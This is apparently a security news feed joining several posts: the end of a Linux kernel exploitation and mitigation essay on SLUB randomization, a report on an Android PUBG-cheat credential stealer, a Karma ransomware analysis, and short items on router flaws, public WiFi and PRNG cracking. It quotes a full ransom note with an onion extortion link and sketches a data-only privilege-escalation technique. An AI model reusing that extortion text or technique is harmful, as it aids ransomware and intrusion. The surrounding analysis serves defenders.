36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
struct epoll_filefd *p2)
{
return (p1->file > p2->file ? +1:
(p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

[email protected]:/sys/kernel/slab/filp# cat order 
1
[email protected]:/sys/kernel/slab/filp# cat objs_per_slab
32
[email protected]:/sys/kernel/slab/filp#

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
[ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
[ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
[ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
[ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
[ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
[ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
[ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
if len(alloc_indices) != 32:
continue
# indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
# reverse mapping: memory locations of allocations,
# sorted by index of allocation ('data').
# if we've observed all allocations in a page,
# these will really be indices into the page.
memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
print(memory_location_by_index)
$ ./slub_demo.py
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main usecase.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much of a relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification

Social Network Account Stealers Hidden in Android Gaming Hacking Tool

19 October 2021 at 13:02

Authored by: Wenfeng Yu

McAfee Mobile Research team recently discovered a new piece of malware that specifically steals Google, Facebook, Twitter, Telegram and PUBG game accounts. This malware hides in a game assistant tool called “DesiEsp” which is an assistant tool for PUBG game available on GitHub. Basically, cyber criminals added their own malicious code based on this DesiEsp open-source tool and published it on Telegram. PUBG game users are the main targets of this Android malware in all regions around the world but most infections are reported from the United States, India, and Saudi Arabia. 

What is an ESP hack? 

ESP Hacks, (short for Extra-Sensory Perception) are a type of hack that displays player information such as HP (Health Points), Name, Rank, Gun etc. It is like a permanent tuned-up KDR/HP Vision. ESP Hacks are not a single hack, but a whole category of hacks that function similarly and are often used together to make them more effective. 

How can you be affected by this malware? 

After investigation, it was found that this malware was spread in the channels related to PUBG game on the Telegram platform. Fortunately, this malware has not been found on Google Play. 

Figure 1. Re-packaged hacking tool distributed in Telegram
Figure 1. Re-packaged hacking tool distributed in Telegram

Main dropper behavior 

This malware will ask the user to allow superuser permission after running: 

Figure 2. Initial malware requesting root access. 
Figure 2. Initial malware requesting root access.

If the user denies superuser request the malware will say that the application may not work: 

Figure 3. Error message when root access is not provided 
Figure 3. Error message when root access is not provided

When it gains root permission, it will start two malicious actions. First, it will steal accounts by accessing the system account database and application database.  

Figure 4. Get google account from android system account database.
Figure 4. Get a Google account from the Android system account database.

Second, it will install an additional payload with package name com.android.google.gsf.policy_sidecar_aps” using the “pm install” command. The payload package will be in the assets folder, and it will disguise the file name as “*.crt” or “*.mph”. 

Figure 5. Payload disguised as a certificate file (crt extension) 
Figure 5. Payload disguised as a certificate file (crt extension)

Stealing social and gaming accounts 

The dropped payload will not display icons and it does not operate directly on the screen of the user’s device. In the apps list of the system settings, it usually disguises the package name as something like “com.google.android.gsf” to make users think it is a system service of Google. It runs in the background in the way of Accessibility Service. Accessibility Service is an auxiliary function provided by the Android system to help people with physical disabilities use mobile apps. It will connect to other apps like a plug-in and can it access the Activity, View, and other resources of the connected app. 

The malware will first try to get root permissions and IMEI (International Mobile Equipment Identity) code that later access the system account database. Of course, even if it does not have root access, it still has other ways to steal account information. Finally, it also will try to activate the device-admin to difficult its removal. 

Methods to steal account information 

The first method to steal account credentials that this malware uses is to monitor the login window and account input box text of the stolen app through the AccessibilityService interface to steal account information. The target apps include Facebook (com.facebook.kakana), Twitter (com.twitter.android), Google (com.google.android.gms) and PUBG MOBILE game (com.tencent.ig) 

The second method is to steal account information (including account number, password, key, and token) by accessing the account database of the system, the user config file, and the database of the monitored app. This part of the malicious code is the same as the parent sample above: 

Figure 6. Malware accessing Facebook account information using root privileges 
Figure 6. Malware accessing Facebook account information using root privileges

Finally, the malware will report the stolen account information to the hacker’s server via HTTP.  

Gaming users infected worldwide 

PUBG games are popular all over the world, and users who use PUBG game assistant tools exist in all regions of the world. According to McAfee telemetry data, this malware and its variants affect a wide range of countries including the United States, India, and Saudi Arabia:  

Figure 7. Top affected countries include USA, India and Saudi Arabia
Figure 7. Top affected countries include USA, India , and Saudi Arabia

Conclusion 

The online game market is revitalizing as represented by e-sports. We can play games anywhere in various environments such as mobiles, tablets, and PCs (personal computers). Some users will be looking for cheat tools and hacking techniques to play the game in a slightly advantageous way. Cheat tools are inevitably hosted on suspicious websites by their nature, and users looking for cheat tools must step into the suspicious websites. Attackers are also aware of the desires of such users and use these cheat tools to attack them. 

This malware is still constantly producing variants that use several ways to counter the detection of anti-virus software including packing, code obfuscation, and strings encryption, allowing itself to infect more game users. 

McAfee Mobile Security detects this threat as Android/Stealer and protects you from this malware attack. Use security software on your device. Game users should think twice before downloading and installing cheat tools, especially when they request Superuser or accessibility service permissions. 

Indicators of Compromise 

Dropper samples 

36d9e580c02a196e017410a6763f342eea745463cefd6f4f82317aeff2b7e1a5

fac1048fc80e88ff576ee829c2b05ff3420d6435280e0d6839f4e957c3fa3679

d054364014188016cf1fa8d4680f5c531e229c11acac04613769aa4384e2174b

3378e2dbbf3346e547dce4c043ee53dc956a3c07e895452f7e757445968e12ef

7e0ee9fdcad23051f048c0d0b57b661d58b59313f62c568aa472e70f68801417

6b14f00f258487851580e18704b5036e9d773358e75d01932ea9f63eb3d93973

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

ff186c0272202954def9989048e1956f6ade88eb76d0dc32a103f00ebfd8538e

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

3726dc9b457233f195f6ec677d8bc83531e8bc4a7976c5f7bb9b2cfdf597e86c

e815b1da7052669a7a82f50fabdeaece2b73dd7043e78d9850c0c7e95cc0013d

Payload samples 

8ef54eb7e1e81b7c5d1844f9e4c1ba8baf697c9f17f50bfa5bcc608382d43778

4e08e407c69ee472e9733bf908c438dbdaebc22895b70d33d55c4062fc018e26

6e7c48909b49c872a990b9a3a1d5235d81da7894bd21bc18caf791c3cb571b1c

9099908a1a45640555e70d4088ea95e81d72184bdaf6508266d0a83914cc2f06

ca29a2236370ed9979dc325ea4567a8b97b0ff98f7f56ea2e82a346182dfa3b8

d2985d3e613984b9b1cba038c6852810524d11dddab646a52bf7a0f6444a9845

ef69d1b0a4065a7d2cc050020b349f4ca03d3d365a47be70646fd3b6f9452bf6

06984d4249e3e6b82bfbd7da260251d99e9b5e6d293ecdc32fe47dd1cd840654

Domain 

hosting-b5476[.]gq 

The post Social Network Account Stealers Hidden in Android Gaming Hacking Tool appeared first on McAfee Blogs.

Vulnerability Spotlight: Multiple vulnerabilities in ZTE MF971R LTE router

18 October 2021 at 19:04
Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.  Cisco Talos recently discovered multiple vulnerabilities in the ZTE MF971R LTE portable router.  The MF971R is a portable router with Wi-Fi support and works as an LTE/GSM modem. An attacker could...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Karma Ransomware | An Emerging Threat With A Hint of Nemty Pedigree

18 October 2021 at 16:43

Karma is a relatively new ransomware threat actor, having first been observed in June of 2021. The group has targeted numerous organizations across different industries. Reports of a group with the same name from 2016 are not related to the actors currently using the name. An initial technical analysis of a single sample related to Karma was published by researchers from Cyble in August.

In this post, we take a deeper dive, focusing on the evolution of Karma through multiple versions of the malware appearing through June 2021. In addition, we explore the links between Karma and other well known malware families such as NEMTY and JSWorm and offer an expanded list of technical indicators for threat hunters and defenders.

Initial Sample Analysis

Karma’s development has been fairly rapid and regular with updated variants and improvements, oftentimes building multiple versions on the same day. The first few Karma samples our team observed were:

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f

Sample 1 was compiled on 18th, June 2021 and Samples 2 and 3 the following day on the 19th, a few minutes apart. Basic configuration between these samples is similar, though there are some slight differences such as PDB paths.

After Sample 1, we see more of the core features appear, including the writing of the ransom note. Upon execution, these payloads would enumerate all local drives (A to Z) , and encrypt files where possible.

Further hunting revealed a number of other related samples all compiled within a few days of each other. The following table illustrates compilation timestamps and payload size across versions of Karma compiled in a single week. Note how the payload size decreases as the authors’ iterate.

Ransom Note is not Created in Sample 1.

Also, the list of excluded extensions is somewhat larger in Sample 1 than in both Samples 2 and 3, and the list of extensions is further reduced from Sample 5 onwards to only exclude “.exe”, “.ini”, “.dll”, “.url” and “.lnk”.

The list of excluded extensions is reduced as the malware authors iterate

Encryption Details

From Sample 2 onwards, the malware calls CreateIoCompletionPort, which is used for communication between the main thread and a sub thread(s) handling the encryption process. This specific call is key in managing efficiency of the encryption process (parallelization in this case).

Individual files are encrypted by way of a random Chacha20 key. Once files are encrypted, the malware will encrypt the random Chacha20 key with the public ECC key and embed it in the encrypted file.

Chacha Encryption

Across Samples 2 to 5, the author removed the CreateIoCompletionPort call, instead opting to create a new thread to manage enumeration and encryption per drive. We also note the “KARMA” mutex created to prevent the malware from running more than once. Ransom note names have also been updated to “KARMA-ENCRYPTED.txt”.

Diving in deeper, some samples show that the ChaCha20 algorithm has been swapped out for Salsa20. The asymmetric algorithm (for ECC) has been swapped from Secp256k1 to Sect233r1. Some updates around execution began to appear during this time as well, such as support for command line parameters.

A few changes were noted in Samples 6 and 7. The main difference is the newly included background image. The file “background.jpg” is written to %TEMP% and set as the Desktop image/wallpaper for the logged in user.

Desktop image change and message

Malware Similarity Analysis

From our analysis, we see similarities between JSWorm and the associated permutations of that ransomware family such as NEMTY, Nefilim, and GangBang. Specifically, the Karma code analyzed bears close similarity to the GangBang or Milihpen variants that appeared around January 2021.

Some high-level similarities are visible in the configurations.

We can see deeper relationships when we conduct a bindiff on Karma and GangBang samples. The following image shows how similar the main() functions are:

The main() function & argument processing in Gangbang (left) and Karma

Victim Communication

The main body of the ransom note text hasn’t changed since the first sample and still contains mistakes. The ransom notes are base64-encoded in the binary and dropped on the victim machine with the filename “KARMA-AGREE.txt” or, in later samples, “KARMA-ENCRYPTED.txt”.

Your network has been breached by Karma ransomware group.
We have extracted valuable or sensitive data from your network and encrypted the data on your systems.
Decryption is only possible with a private key that only we posses.
Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.
Scamming is just bad for business in this line of work.
Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.
We advise you not to use any data recovery tools without leaving copies of the initial encrypted file.
You are risking irreversibly damaging the file by doing this.
If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/

If a ransom is payed we will provide the decryption key and proof that we deleted you data.
When you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.

How to contact us:

{[email protected]}
{[email protected]}
{[email protected]}

Each sample observed offers three contact emails, one for each of the mail providers onionmail, tutanota, and protonmail. In each sample, the contact emails are unique, suggesting they are specific communication channels per victim. The notes contain no other unique ID or victim identifier as sometimes seen in notes used by other ransomware groups.

In common with other operators, however, the Karma ransom demand threatens to leak victim data if the victim does not pay. The address of a common leaks site where the data will be published is also given in the note. This website page appears to have been authored in May 2021 using WordPress.

The Karma Ransomware Group’s Onion Page

Conclusion

Karma is a young and hungry ransomware operation. They are aggressive in their targeting, and show no reluctance in following through with their threats. The apparent similarities to the JSWorm family are also highly notable as it could be an indicator of the group being more than they appear. The rapid iteration over recent months suggests the actor is investing in development and aims to be around for the foreseeable future. SentinelLabs continues to follow and analyze the development of Karma ransomware.

Indicators of Compromise

SHA1s
Karma Ransomware

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f
Sample 4: c4cd4da94a2a1130c0b9b1bf05552e06312fbd14
Sample 5: bb088c5bcd5001554d28442bbdb144b90b163cc5
Sample 6: 5ff1cd5b07e6c78ed7311b9c43ffaa589208c60b
Sample 7: 08f1ef785d59b4822811efbc06a94df16b72fea3
Sample 8: b396affd40f38c5be6ec2fc18550bbfc913fc7ea

Gangbang Sample 
ac091ce1281a16f9d7766a7853108c612f058c09

Karma Desktop image
%TEMP%/background.jpg
7b8c45769981344668ce09d48ace78fae50d71bc

Victim Blog (TOR)
http[:]//3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd[.]onion/

Ransom Note Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

MITRE ATT&CK
T1485 Data Destruction
T1486 Data Encrypted for Impact
T1012 Query Registry
T1082 System Information Discovery
T1120 Peripheral Device Discovery
T1204 User Execution
T1204.002 User Execution: Malicious File

Is Using Public WiFi Safe?

18 October 2021 at 13:30

Using public WiFi can leave you and your employees open to man-in-the-middle cyber attacks. With the increase of remote work, organizations must teach their employees how to stay safe on open WiFi networks. Get our tips on how to protect against hackers while on open WiFi networks.

The post Is Using Public WiFi Safe? appeared first on VerSprite.

Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister

18 October 2021 at 13:00

Outline

1. Introduction

In part 1 of this post, we showed how to train a Neural Network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although ML had learned the hidden internal structure of the xorshift128 PRNG, it is a very simple PRNG that we used as a proof of concept.

The same concept applies to a more complex structured PRNG, namely Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still: not cryptographically secure) PRNG [1].  It can have a very long period of 32bit words with a statistically uniform distribution. There are many variants of the MT PRNG that follows the same algorithm but differ in the constants and configurations of the algorithm. The most commonly used variant of MT is MT19937. Hence, for the rest of this article, we will focus more on this variant of MT.

To crack the MT algorithm, we need first to examine how it works. In the next section, we will discuss how MT works.

** Editor’s Note: How does this relate to security? While both the research in this blog post (and that of Part 1 in this series) looks at a non-cryptographic PRNG, we are interested, generically, in understanding how machine learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use machine learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space, extending the approach used for xorshift128 to Mersenne Twister, a non-cryptographic PRNG sometimes mistakenly used where a cryptographically-secure PRNG is required. **

